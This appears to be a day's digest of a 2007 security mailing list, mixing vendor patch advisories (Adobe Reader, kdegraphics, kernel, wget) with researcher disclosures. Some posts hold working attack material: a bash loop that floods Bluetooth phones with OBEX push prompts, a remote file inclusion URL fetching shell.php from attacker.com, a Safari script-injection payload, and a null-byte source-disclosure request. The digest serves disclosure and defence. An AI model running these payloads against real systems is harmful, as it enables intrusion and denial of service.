[ GLSA 200701-16 ] Adobe Acrobat Reader: Multiple vulnerabilities

2007-01-23 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200701-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Adobe Acrobat Reader: Multiple vulnerabilities
  Date: January 22, 2007
  Bugs: #159874
ID: 200701-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Adobe Acrobat Reader is vulnerable to remote code execution, Denial of
Service, and cross-site scripting attacks.

Background
==

Adobe Acrobat Reader is a PDF reader released by Adobe.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  app-text/acroread7.0.9  = 7.0.9

Description
===

Adobe Acrobat Reader in stand-alone mode is vulnerable to remote code
execution via heap corruption when loading a specially crafted PDF
file.

The browser plugin released with Adobe Acrobat Reader (nppdf.so) does
not properly handle URLs, and crashes if given a URL that is too long.
The plugin does not correctly handle JavaScript, and executes
JavaScript that is given as a GET variable to the URL of a PDF file.
Lastly, the plugin does not properly handle the FDF, xml, xfdf AJAX
request parameters following the # character in a URL, allowing for
multiple cross-site scripting vulnerabilities.

Impact
==

An attacker could entice a user to open a specially crafted PDF file
and execute arbitrary code with the rights of the user running Adobe
Acrobat Reader. An attacker could also entice a user to browse to a
specially crafted URL and either crash the Adobe Acrobat Reader browser
plugin, execute arbitrary JavaScript in the context of the user's
browser, or inject arbitrary HTML or JavaScript into the document being
viewed by the user. Note that users who have emerged Adobe Acrobat
Reader with the nsplugin USE flag disabled are not vulnerable to
issues with the Adobe Acrobat Reader browser plugin.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Adobe Acrobat Reader users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =app-text/acroread-7.0.9

References
==

  [ 1 ] CVE-2006-5857
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5857
  [ 2 ] CVE-2007-0044
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0044
  [ 3 ] CVE-2007-0045
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0045
  [ 4 ] CVE-2007-0046
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0046
  [ 5 ] CVE-2007-0048
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0048

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200701-16.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpQsfVWgDNiY.pgp
Description: PGP signature


Re: Re: Re: SMF index.php?action=pm Cross Site-Scripting

2007-01-23 Thread Outlaw
This bug has been tested on the versions SMF 1.1.1
and 1.1 RC3. 

Aria-Security Team
http://aria-security.net


Re: Fantastic News =- (news.php) Remote File Include Vulnerability - bogus... again

2007-01-23 Thread Mailinglists Address


 Author: BorN To K!LL

Maybe this person should be called BorN To Gr3p or BorN To Post Fake
and Pointl3ss ExploiTz!
 ###

 Bug in :.  news.php

 code :
 require_once($CONFIG['script_path'].functions/functions.php);
 require_once($CONFIG['script_path'].functions/mysql.php);
 require_once($CONFIG['script_path'].functions/template.php);
Two lines above the previous code is the following two lines:

unset($CONFIG);
require_once(config.php);

Once again... security auditing via grep doesn't give you enough
information to post a complete and accurate bug/security report.
Honestly, do you have a bash one liner that you just feed scripts to,
that generates these bogus and pointless reports?

It is getting to the point where I almost don't bother to check the code
any more.

 GreeTz to :.

M4d pr0ps to vim, grep and sed.


rPSA-2007-0011-1 wget

2007-01-23 Thread rPath Update Announcements
rPath Security Advisory: 2007-0011-1
Published: 2007-01-23
Products: rPath Linux 1
Rating: Informational
Exposure Level Classification:
Indirect Deterministic Denial of Service
Updated Versions:
wget=/[EMAIL PROTECTED]:devel//1/1.10.2-4-0.1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6719
https://issues.rpath.com/browse/RPL-930

Description:
Previous versions of the wget package can crash if they contact a
malicious FTP server.  No further vulnerability is enabled by this
minor flaw; system security is not threatened in any way.


[ MDKSA-2007:024 ] - Updated kdegraphics packages fix crafted pdf file vulnerability

2007-01-23 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:024
 http://www.mandriva.com/security/
 ___
 
 Package : kdegraphics
 Date: January 22, 2007
 Affected: 2007.0, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 The Adobe PDF specification 1.3, as implemented by xpdf 3.0.1 patch 2,
 kpdf in KDE before 3.5.5, and other products, allows remote attackers
 to have an unknown impact, possibly including denial of service
 (infinite loop), arbitrary code execution, or memory corruption, via a
 PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages
 attribute that references an invalid page tree node.

 The updated packages have been patched to correct this problem.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 0cd41c0355a39824f669cac0c5013169  
2007.0/i586/kdegraphics-3.5.4-7.2mdv2007.0.i586.rpm
 6a9e0d68fe53b0886210de67360eed3f  
2007.0/i586/kdegraphics-common-3.5.4-7.2mdv2007.0.i586.rpm
 470dc3c84192a915d1a318168aa3cc64  
2007.0/i586/kdegraphics-kcolorchooser-3.5.4-7.2mdv2007.0.i586.rpm
 32e05dc7c4ae0a78ccf8fbb22712fce8  
2007.0/i586/kdegraphics-kcoloredit-3.5.4-7.2mdv2007.0.i586.rpm
 7379e6974d963f5f19e4485f98c4c75a  
2007.0/i586/kdegraphics-kdvi-3.5.4-7.2mdv2007.0.i586.rpm
 31025f05167cf00dc9f9aa8cdd9ae9ea  
2007.0/i586/kdegraphics-kfax-3.5.4-7.2mdv2007.0.i586.rpm
 1194b194a06049d9b6c40b7df89d25c0  
2007.0/i586/kdegraphics-kghostview-3.5.4-7.2mdv2007.0.i586.rpm
 8768ca0900e75182cd6ebb603ac81d0d  
2007.0/i586/kdegraphics-kiconedit-3.5.4-7.2mdv2007.0.i586.rpm
 86bf695e519c6fd20ca7a454bbe3f6f8  
2007.0/i586/kdegraphics-kolourpaint-3.5.4-7.2mdv2007.0.i586.rpm
 2f7eecf73812c0196f7d3c70e5fc8a38  
2007.0/i586/kdegraphics-kooka-3.5.4-7.2mdv2007.0.i586.rpm
 985c0a645812377949177d6e07283556  
2007.0/i586/kdegraphics-kpdf-3.5.4-7.2mdv2007.0.i586.rpm
 247591ab0e437c25d46d755a622c4a6a  
2007.0/i586/kdegraphics-kpovmodeler-3.5.4-7.2mdv2007.0.i586.rpm
 e6857a3e30e06fce42f8a63331d0d04c  
2007.0/i586/kdegraphics-kruler-3.5.4-7.2mdv2007.0.i586.rpm
 dbc566e75a97fa4d54fb4c96d2171868  
2007.0/i586/kdegraphics-ksnapshot-3.5.4-7.2mdv2007.0.i586.rpm
 0ae8ec2f105b1797eed7f14fe1f972a1  
2007.0/i586/kdegraphics-ksvg-3.5.4-7.2mdv2007.0.i586.rpm
 0a1be40a56fb46bed7320cca4f6795cc  
2007.0/i586/kdegraphics-kuickshow-3.5.4-7.2mdv2007.0.i586.rpm
 f1862b323da63bdf4a5ee82649f64f6d  
2007.0/i586/kdegraphics-kview-3.5.4-7.2mdv2007.0.i586.rpm
 08474806d83e756759f7f9a50a57eb63  
2007.0/i586/kdegraphics-mrmlsearch-3.5.4-7.2mdv2007.0.i586.rpm
 92aafc29e6a8663ada111b622f4966f4  
2007.0/i586/libkdegraphics0-common-3.5.4-7.2mdv2007.0.i586.rpm
 18e12acc104fef371ee43754a1ef9f82  
2007.0/i586/libkdegraphics0-common-devel-3.5.4-7.2mdv2007.0.i586.rpm
 4d9ba15dc6ca92ae0d33cf382c60447b  
2007.0/i586/libkdegraphics0-kghostview-3.5.4-7.2mdv2007.0.i586.rpm
 533fe072755ab1cad0a841f7f5923882  
2007.0/i586/libkdegraphics0-kghostview-devel-3.5.4-7.2mdv2007.0.i586.rpm
 954bd2bb51edbdb9b9139a8e30b0f7b5  
2007.0/i586/libkdegraphics0-kooka-3.5.4-7.2mdv2007.0.i586.rpm
 3c0e6cc9b6f7d19fd261faacca8a0d80  
2007.0/i586/libkdegraphics0-kooka-devel-3.5.4-7.2mdv2007.0.i586.rpm
 c4183748519d66a0fce222e667b40a07  
2007.0/i586/libkdegraphics0-kpovmodeler-3.5.4-7.2mdv2007.0.i586.rpm
 8b00015eb9b5fd80942ce7bd90dabb81  
2007.0/i586/libkdegraphics0-kpovmodeler-devel-3.5.4-7.2mdv2007.0.i586.rpm
 52472c010fff010454288391902a6e6d  
2007.0/i586/libkdegraphics0-ksvg-3.5.4-7.2mdv2007.0.i586.rpm
 61c8ca7bf0e5ae26d5d93b0f3b472a34  
2007.0/i586/libkdegraphics0-ksvg-devel-3.5.4-7.2mdv2007.0.i586.rpm
 ef27b1287e78a14f9ccc3a76b9255052  
2007.0/i586/libkdegraphics0-kview-3.5.4-7.2mdv2007.0.i586.rpm
 5bd75a572c9e1762af0def657b497f41  
2007.0/i586/libkdegraphics0-kview-devel-3.5.4-7.2mdv2007.0.i586.rpm 
 6f2928e61268d085e710f68ef577ed36  
2007.0/SRPMS/kdegraphics-3.5.4-7.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 0ce936615224ead11ac475808691a56f  
2007.0/x86_64/kdegraphics-3.5.4-7.2mdv2007.0.x86_64.rpm
 3320412a840fab74c6c2bd9f6efd909a  
2007.0/x86_64/kdegraphics-common-3.5.4-7.2mdv2007.0.x86_64.rpm
 15b9efa532fc48c71d21fc721ee43158  
2007.0/x86_64/kdegraphics-kcolorchooser-3.5.4-7.2mdv2007.0.x86_64.rpm
 7dadfafb418caca77be62eee0487d12b  
2007.0/x86_64/kdegraphics-kcoloredit-3.5.4-7.2mdv2007.0.x86_64.rpm
 4654670d37cb55420f6e3368b504726c  
2007.0/x86_64/kdegraphics-kdvi-3.5.4-7.2mdv2007.0.x86_64.rpm
 3a50b066541f2359a0b09a0fd0bb4475  
2007.0/x86_64/kdegraphics-kfax-3.5.4-7.2mdv2007.0.x86_64.rpm
 6c14c3639571fc0fd8cf022efdeca5ea  

Bluetooth DoS by obex push

2007-01-23 Thread hornung
Hello,

during a course project studying security and privacy related to Bluetooth, we 
discovered a simple but effective DoS attack using OBEX push.

Using ussp-push [1], it is possible to send out files very quickly. By 
continuously trying to push a #64257;le, the target is #64258;ooded with 
prompts whether to accept the #64257;le or not, which disables any other usage 
on the phone, including the ability to turn off Bluetooth.
We confirmed the attack to work on the following phones:

- Sony Ericsson K700i
- Nokia N70
- Motorola MOTORAZR V3
- Sony Ericsson W810i
- LG Chocolate KG800

and expect nearly all available phones with Bluetooth to be vulnerable (in 
contrary to the previous DoS by l2ping).

A proof-of-concept code is attached, using ussp-push and targeting a known MAC. 
This could be easily extended to target all visible devices. Plus, a user could 
be forced to accept a possibly malicious file with this attack. Using only one 
Bluetooth-Dongle, we were able to practically disable three phones 
simlutaneously.

Best regards,
Stefan Ekerfelt and Armin Hornung

[1] http://www.xmailserver.org/ussp-push.html


Bluetooth DoS by obex push

2007-01-23 Thread Armin Hornung
Hello,

during a course project studying security and privacy related to
Bluetooth, we discovered a simple but effective DoS attack using OBEX push.

Using ussp-push [1], it is possible to send out files very quickly. By
continuously trying to push a file, the target is flooded with prompts
whether to accept the file or not, which disables any other usage on the
phone, including the ability to turn off Bluetooth.
We confirmed the attack to work on the following phones:

- Sony Ericsson K700i
- Nokia N70
- Motorola MOTORAZR V3
- Sony Ericsson W810i
- LG Chocolate KG800

and expect nearly all available phones with Bluetooth to be vulnerable
(in contrary to the previous DoS by l2ping).

A proof-of-concept code is attached (plain text), using ussp-push and
targeting a known MAC. This could be easily extended to target all
visible devices.
Plus, a user could be forced to accept a possibly malicious file with
this attack. Using only one Bluetooth-Dongle, we were able to
practically disable three phones simlutaneously.

Best regards,
Stefan Ekerfelt and Armin Hornung

[1] http://www.xmailserver.org/ussp-push.html




#!/bin/bash

checkOPUSH()
{
MAC=$1
OCHAN=$(sdptool search --bdaddr $MAC OPUSH | grep Channel:)
if test $OCHAN != 
then
OCHAN=$(echo $OCHAN | awk '/Channel:/ { print $2 }')
return $OCHAN
fi
return 0
}


if test $# -ne 2
then
 echo Usage: $0 bdaddr filename
 exit 127
fi

MAC=$1
FILENAME=$2

checkOPUSH $1
OCHAN=$?

if test $OCHAN -eq 0 
then
 echo Couldn't connect to $MAC via OBEX push.
 exit 127   
fi


while true
do
./ussp-push [EMAIL PROTECTED] $FILENAME $FILENAME
done


xss filter to protect from xss attacks

2007-01-23 Thread Anurag Agarwal
I have created a xss filter to protect from xss attacks. Though i have 
filtered only for 8 characters but i was able to test against all the 
attacks mentioned in the RSnake's cheat sheet. Appscan was not able to 
detect any xss attacks on it. I request the application security community 
to help test this filter. 90% i am sure that you wont be able to perform any 
xss attack on it, the rest 10% i will find out after the feedback from the 
community. For the curious mind, it is written in java


In case if you are successful in performing xss attack, please do reply to 
this email with your name, browser and the xss attack string.


url - http://www.attacklabs.com/xssfilter/

I appreciate your time and effort. Thanks a lot in advance

regards
Anurag 



Safari Improperly Parses HTML Documents BlogSpot XSS vulnerability

2007-01-23 Thread Jose Avila III

Overview:

Safari on occasions may improperly parse the source of an HTML  
document, which can lead to the execution of html tags within  
comments. This can become dangerous when input filters allow html  
tags within comments, as they will get parsed and executed under  
certain circumstances.


Details:

In some cases you can cause Apple’s Safari browser to execute code  
when it should not be executed. In the following example everything  
within the comment, in theory should never be executed; however,  
safari decides to execute the script tag.


titlemyblog!--/title/headbodyscript src=http://beanfuzz.com/ 
bean.js --/title


Blogs hosted on BlogSpot.com have filter mechanisms for their input;  
however, they will allow you to inject anything within comments. This  
made it possible to cross site script blogspot.com. Note: Only Safari  
viewers will be affected.


Proof of concept: http://dirtybean1234.blogspot.com/

Initial release of vulnerability: http://www.beanfuzz.com/wordpress/? 
p=99


Vendor Response:

I was unable to get a response from the vendor in regards to this issue

Questions / Comments:
Jose (at) onzra (dot) com


Register for my RSA 2007 Training Course
Creative Web Protocol Attacks, Beyond Web Hacking
February 4, 5 2007 San Francisco
https://cm.rsaconference.com/US07/catalog/eventguide/publicSchedule.jsp






Re: Multiple OS kernel insecure handling of stdio file descriptor

2007-01-23 Thread eugeny gladkih
 SP == Shiva Persaud [EMAIL PROTECTED] writes:

  XFOCUS team (http://www.xfocus.org/)  had discovered Multiple OS kernel
  insecure handling of stdio file descriptor.
  
  ===
  Affected OS Version
  
  AIX 5.3

 SP The AIX Security Team can be reached at [EMAIL PROTECTED]

 SP We have investigated this issue and AIX is not affected. A privileged
 SP process will not inherit closed file descriptors for stdio, stdout and
 SP stderr.

well, but what is used for stdout if it's closed in the parent
process just before fork(2) call?!

-- 
Yours sincerely, Eugeny.
Doctor Web, Ltd. http://www.drweb.com


rPSA-2007-0012-1 ed

2007-01-23 Thread rPath Update Announcements
rPath Security Advisory: 2007-0012-1
Published: 2007-01-23
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Local User Non-deterministic Vulnerability
Updated Versions:
ed=/[EMAIL PROTECTED]:devel//1/0.4-1-0.1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6939
https://issues.rpath.com/browse/RPL-962

Description:
Previous versions of the ed package are vulnerable to a symlink
attack which allows a local attacker to overwrite arbitrary files
writeable by the user running ed with contents provided by the
user running the ed program.


Adobe ColdFusion Information Disclosure

2007-01-23 Thread zck zck

Hi people,

I was wondering whether I was right or not about this vuln:
http://www.securityfocus.com/bid/21978

Unfortunately, I don't have a Colfusion to test on.. What I would do is:
http://colfusion-server/an-existing-file.cfm%2500.cfm

and I expect the server to spit out the source code

Am I right here? Did anybody try this out? If so, how did you do it?
Thank you.

Cheers,
Mateo


AToZed Software Intraweb Component for Borland Delphi and Kylix DoS vulnerability

2007-01-23 Thread C0r3 1mp4ct

Type: Deniel of Service
Severity: Critical
Title: AToZed Software IntraWeb Component for Borland Delphi and Kylix
DoS vulnerability
Date: January 23, 2007

Synopsys


A DoS vulnerability exists in the IntraWeb Component of AToZed Software.

Background
-

IntraWeb is a RAD component for Borland Delphi and Kylix by AToZed Software,
which allows developers to rapidly develop webapplication.
This component is commonly used by Borland developers internationally.

Description
---

DoS conditions occurs, when a specially crafted HTTP request is sent
to the webapplication.
After the request, the affected thread enters into an infinte loop, and hangs.
Under IIS 5.x, the thread will never be stopped.
Under IIS 6 the webserver automatically stops the thread after the
configured amount of time, or CPU usage.

Impact
--

An attack can cause the webapplication to slow down, and after more
specially crafted request, to stop processing requests.

WorkAround
--

There is no vendor supplied workaround for the problem at this time.

A possible workaround can be, to filter the request body for the
special request, and repair it.
It can be achieved, by overriding the function called
OnBeforeDispatch of the TIWServerController object, and repair the
request, by changing the Request.Content field.

Affected versions
-

IntraWeb 8.0 and lower versions

Vulnerability timeline
--

2006.08.   - Vendor notified, but no answer
2007.01.23 - Vulnerability publicly available

Discovery is credited to: C0r31mp4ct


Re: Digital Armaments Security Advisory 20.01.2007: Grsecurity Kernel PaX Vulnerability

2007-01-23 Thread nospam
Could you please provide more details about this vulnerability ? Especially 
which versions are affected :-)

Kind regards,

Marek Kroemeke 


Re: phpAdsNew 2.0.7 Remote File Include

2007-01-23 Thread l . d . 0
what ?

no bug there ?

can u give us proof ! examples !!

thanks

by [EMAIL PROTECTED]
l.d.0


rPSA-2007-0015-1 libsoup

2007-01-23 Thread rPath Update Announcements
rPath Security Advisory: 2007-0015-1
Published: 2007-01-23
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Indirect Denial of Service
Updated Versions:
libsoup=/[EMAIL PROTECTED]:devel//1/2.2.99-1-0.1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5876
https://issues.rpath.com/browse/RPL-965

Description:
Previous versions of the libsoup package are vulnerable to an indirect
denial of service in which a malicious or faulty server responds to
requests with malformed HTTP headers, causing the application that
uses libsoup to crash.


Re: Windows logoff bug possible security vulnerability and exploit.

2007-01-23 Thread Bart ....

Dear Rage Coder,

I think this is a now problem, see Microsoft knowledge base article 837115:
http://support.microsoft.com/kb/837115

Microsoft recommend to use User Profile Hive Cleanup Service:
http://www.microsoft.com/downloads/details.aspx?FamilyID=1B286E6D-8912-4E18-B570-42470E2F3582displaylang=en

Can you tel me of this helps solving your problem?

Greetz
Bart

Rage Coder wrote:
The problem only occurs at times.  To reproduce the problem, I just use the 
computer normally, and at each logon check the event viewer and running 
processes to see if a profile unload failed.  I don't have any special 
terminal software or other logon software installed.


I find that if I wait for a little bit after logging off before logging on 
again, no running programs from the previous logon are present, but if I 
log on just after logging off, they will be if the profile unload fails.  
That still shouldn't be the case.  My brother frequently goes on his 
account right after I go off; there shouldn't be a time limit to wait in 
order to prevent this.


I noticed an interesting thing about XP and fast user switching which would 
likely stop this problem.  When logging on, the first logged on user is 
given session ID 0, as shown in task manager, but if I 'switch' to another 
user, the user is given a different session ID.  It seems that no two users 
are given the same session ID when using fast user switching. But when 
logging off all users and then back on, it is back to session 0.  And if I 
just log on as a user, log off, and then on as another user without using 
the 'switch user', they both are session ID 0.


The same thing happens when using classic logon and on 2003.  All logons 
are given session ID 0.  I did some reading in the platform SDK and some 
sites about stuff, and it seems that these sessions literally create an 
isolation.  Messages sent from a process in one session ID are not visible 
to processes in another, windows created only appear on the desktop 
associated with that session of the process that created the window, etc.


Ideally, running classic logon always as session 0 'should' work because 
ideally when logging of, the processes ran 'should' close, so the next user 
to log on would have nothing to access.  But this does not appear to be the 
case at all times.


A few moments ago I logged in as administrator to do some minor changes, 
and I ran EPIM to take some notes of things.  When I logged of and back on 
as a regular using, 'explorer.exe', 'essentialpim.exe', 'seamonkey.exe' 
were still running as Administrator, event viewer showed the usual UserEnv 
messages, and EPIM appeared on the system tray.  My guess is something like 
this happens:


Logon Administrator : Session ID 0
Run EssentialPIM : Session ID 0
Do some stuff
Logoff Administrator : Profile unload fails, a few programs continue 
running

Logon Normal User : Session ID 0
Explorer runs, and at startup broadcasts 'TaskbarCreated' message
All processes in session 0 get this message, EPIM adds system tray icon 
like it is supposed to


If each logon, even in classic mode, is given a separate session ID as is 
done in fast user switching, this would not happen, even if the profile 
unload fails and the programs continue to run waiting for the profile to 
unload:


Logon Administrator : Session ID 0
Run EssentialPIM : Session ID 0
Do some stuff
Logoff Administrator : Profile unload fails, a few programs continue 
running

Logon Normal User : Session ID 1
Explorer runs, and at startup broadcasts 'TaskbarCreated' message
All processes in session 1 get this message
Programs that may continue to run in session 0 are isolated

If I log on as administrator again, it would be ok to reuse session 0, but 
for a given boot, no two users should be assigned the same logon session 
ID.  I.E.  if I log on as Normal User again, it would be session 1,  etc.


This would not prevent a profile from failing to unload, and would not 
prevent the processes from continuing to run, but it will prevent a user 
from a later logon from accessing the processes in the current logon.


[EMAIL PROTECTED] wrote:

Dear Rage Coder,

 I've seen unloaded profiles for many times, but I never saw application
 still  running  after  logoff.  Profile  itself doesn't create security
 vulnerability, since it can not be accessed by another user.

 What do you use to reproduce this vulnerability?

 Are  you  sure  you  do  not  use some different software which affects
 logon/logoff process, e.g. 3rd party terminal software or some security
 enhancement?


_
Valentine’s Day -- Shop for gifts that spell L-O-V-E at MSN Shopping 
http://shopping.msn.com/content/shp/?ctId=8323,ptnrid=37,ptnrdata=24095tcode=wlmtagline




[ECHO_ADV_62$2007] Upload Service 1.0 remote file inclusion

2007-01-23 Thread y3dips
--
[ECHO_ADV_62$2007] Upload Service 1.0 remote file inclusion
--

Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : January, 21st 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv62-y3dips-2007.txt
Critical Lvl : Critical
--


Affected software description:
~~~

Application : Upload Service
version : 1.0
URL : http://bild-bearbeiten.de/
Download-path : http://bild-bearbeiten.de/scripts/upload_service_1.0.zip

---

1. Install directory are not being remove after installation process
2. Variables $maindir in top.php are not properly sanitized.

---top.php
...
include($maindir.config.php);
include($maindir.functions/error.php);
...
--

When register_globals=on and allow_fopenurl=on an attacker can exploit
this vulnerability with a simple php injection script.

Poc/Exploit:
~

http://target.com/upload/top.php?maindir=http://attacker.com/shell.php?

Solution:
~~
- Remember to remove your install directory and change config.php permission
- Simply Sanitize variable $maindir on affected files. (eg. $maindir= ;)
- Turn off register_globals

Notification:
~

vendor not contact yet

---
Shoutz:

~ my lovely ana
~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff
~ [EMAIL PROTECTED]
~ #e-c-h-o @irc.dal.net
--
Contact:
~

y3dips|| echo|staff || y3dips[at]gmail[dot]com
Homepage: http://y3dips.echo.or.id/

 [ EOF ] -


rPSA-2007-0014-1 libgtop

2007-01-23 Thread rPath Update Announcements
rPath Security Advisory: 2007-0014-1
Published: 2007-01-23
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Local User Deterministic Denial of Service
Updated Versions:
libgtop=/[EMAIL PROTECTED]:devel//1/2.12.0-1.2-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0235
https://issues.rpath.com/browse/RPL-972

Description:
Previous versions of the libgtop package are vulnerable to an attack
in which a local user can at least cause programs that use libgtop
(such as gnome-system-monitor) to crash, and possibly to execute
arbitrary code as the user running the program.


[ MDKSA-2007:025 ] - Updated kernel packages fix multiple vulnerabilities and bugs

2007-01-23 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:025
 http://www.mandriva.com/security/
 ___
 
 Package : kernel
 Date: January 23, 2007
 Affected: Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 Some vulnerabilities were discovered and corrected in the Linux 2.6
 kernel:

 The 2.6 kernel prior to 2.6.12 allows remote attackers to poison the
 bridge forwarding table using frames that have already been dropped by
 filtering, which can cause the bridge to forward spoofed packets
 (CVE-2005-3272).

 Prior to 2.6.15.5, the kernel allows local users to cause a DoS
 (endless recursive fault) via unknown attack vectors related to a
 bad elf entry address on Intel processors (CVE-2006-0741).

 A race condition in the socket buffer handling in the 2.6.9 kernel and
 earlier versions could allow a remote attacker to cause a DoS (crash)
 (CVE-2006-2446).

 Stephane Eranian discovered an issue with permon2.0 where, under
 certain circumstances, the perfmonctl() system call may not correctly
 manage the file descriptor reference count, resulting in the system
 possibly running out of file structure (CVE-2006-3741).

 Prior to and including 2.6.17, the Universal Disk Format (UDF)
 filesystem driver allowed local users to cause a DoS (hang and crash)
 via certain operations involving truncated files (CVE-2006-4145).

 Various versions of the Linux kernel allowed local users to cause a DoS
 (crash) via an SCTP socket with a certain SO_LINGER value, which is
 possibly related to the patch used to correct CVE-2006-3745
 (CVE-2006-4535).

 The __block_prepate_write function in the 2.6 kernel before 2.6.13 does
 not properly clear buffers during certain error conditions, which
 allows users to read portions of files that have been unlinked
 (CVE-2006-4813).

 The clip_mkip function of the ATM subsystem in the 2.6 kernel allows
 remote attackers to dause a DoS (panic) via unknown vectors that cause
 the ATM subsystem to access the memory of socket buffers after they are
 freed (CVE-2006-4997).

 The seqfile handling in the 2.6 kernel up to 2.6.18 allows local users
 to cause a DoS (hang or oops) via unspecified manipulations that
 trigger an infinite loop while searching for flowlabels
 (CVE-2006-5619).

 A missing call to init_timer() in the isdn_ppp code of the Linux kernel
 can allow remote attackers to send a special kind of PPP pakcet which
 may trigger a kernel oops (CVE-2006-5749).

 The aio_setup_ring() function initializes a variable incorrectly which
 can be used in error path to free allocated resources which could allow
 a local user to crash the node (CVE-2006-5754).

 A vulnerability in the bluetooth support could allow for overwriting
 internal CMTP and CAPI data structures via malformed packets
 (CVE-2006-6106).

 The provided packages are patched to fix these vulnerabilities.  All
 users are encouraged to upgrade to these updated kernels immediately
 and reboot to effect the fixes.

 To update your kernel, please follow the directions located at:

 http://www.mandriva.com/en/security/kernelupdate
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3272
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0741
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2446
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3741
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4145
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4535
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4813
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4997
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5619
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5749
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5754
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6106
 ___
 
 Updated Packages:
 
 Corporate 3.0:
 c807857c820dae84bad9beac5ff132c2  
corporate/3.0/i586/kernel-2.6.3.36mdk-1-1mdk.i586.rpm
 9502a05c5049f394b50a4f2128ca7311  
corporate/3.0/i586/kernel-BOOT-2.6.3.36mdk-1-1mdk.i586.rpm
 26b4a92d5ed2c1953fb88fd304584281  
corporate/3.0/i586/kernel-doc-2.6.3-36mdk.i586.rpm
 c2f4619bf4b4d9d3952ccad7eb4be16d  
corporate/3.0/i586/kernel-enterprise-2.6.3.36mdk-1-1mdk.i586.rpm
 20970c40ded39599c4ad6bc976447c8c  
corporate/3.0/i586/kernel-i686-up-4GB-2.6.3.36mdk-1-1mdk.i586.rpm
 5856cd990d971667d673216603cc9b1f  
corporate/3.0/i586/kernel-p3-smp-64GB-2.6.3.36mdk-1-1mdk.i586.rpm
 0e978fa73922d870b487c2f8d14eaff3  
corporate/3.0/i586/kernel-secure-2.6.3.36mdk-1-1mdk.i586.rpm
 fa9f0cdd42385ec68aa79198d2615617  

Re: Multiple SQL injections and XSS in FishCart 3.1

2007-01-23 Thread michael
I am the principal behind FishCart, discussed in the above advisory.  I found 
tonight after posting to bugtraq about another reported problem that this 
previous bug is reported as unpatched.

As best we could determine the post from dcrab was not accurate regarding the 
SQL injection claims.  The original post at 
http://www.securityfocus.com/archive/1/397484 shows invalid sql statements, not 
sql injection.  We found that the URL he had posted was not normal and turned 
up a coding bug that explained the SQL errors, but there was no SQL injection.  
We also had some trouble reproducing some of the XSS errors.  That said, we 
took the claims seriously and immediately went to work to improve error 
hardening.

A fix was worked out among the developers and incorporated into the source in 
mid May 2005.  A version 3.x patch was derived from the source changes and sent 
to the FishCart mailing list on May 21, 2005 for installed FishCarts.  This 
post can be seen at http://www.fishcart.org/archives/200505/msg00028.html.  You 
will need to log in with username 'speak', password 'friend' to see the post.  
While we have continued to refine the process, we think it fair that the patch 
has been available since that date.

Please update your advisory to reflect this information.  If you have any 
further questions please feel free to contact me at your convenience to verify 
my identity or for further details on the fixes.  Thank you for your attention 
to this matter.

   Michael Brennen
   President, FishNet, Inc.
   [EMAIL PROTECTED]
   972.669.0041


Re: DoS against AVM Fritz!Box 7050 (and others)

2007-01-23 Thread Matthias Wenzel
A new FW version with the fix is released:

